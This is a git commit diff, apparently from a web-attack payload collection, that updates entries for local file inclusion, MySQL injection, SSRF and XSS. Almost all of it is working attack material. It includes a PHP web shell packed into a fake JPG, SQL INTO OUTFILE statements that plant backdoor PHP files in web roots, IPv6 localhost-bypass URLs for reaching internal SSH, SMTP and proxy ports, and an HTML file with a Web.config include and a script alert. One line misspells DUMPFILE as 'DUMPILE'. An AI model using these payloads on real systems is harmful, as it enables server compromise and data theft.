MySQL - Code exec

This commit is contained in:
Swissky 2017-11-09 09:05:50 +01:00
parent edd5f3601f
commit f740d8e825
4 changed files with 34 additions and 11 deletions

View File

@ -72,7 +72,7 @@ http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encod
LFI Wrapper ZIP
```python
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

View File

@ -73,4 +73,5 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
```
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
```

View File

@ -43,6 +43,14 @@ http://[::]:22/ SSH
http://[::]:3128/ Squid
```
```
http://0000::1:80/
http://0000::1:25/ SMTP
http://0000::1:22/ SSH
http://0000::1:3128/ Squid
```
Bypass localhost with a domain redirecting to locahost
```
http://n-pn.info

View File

@ -0,0 +1,14 @@
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title></title>
</head>
<body>
<!-- #include file = "Web.config" -->
<script>alert('XSS')</script>
</body>
</html>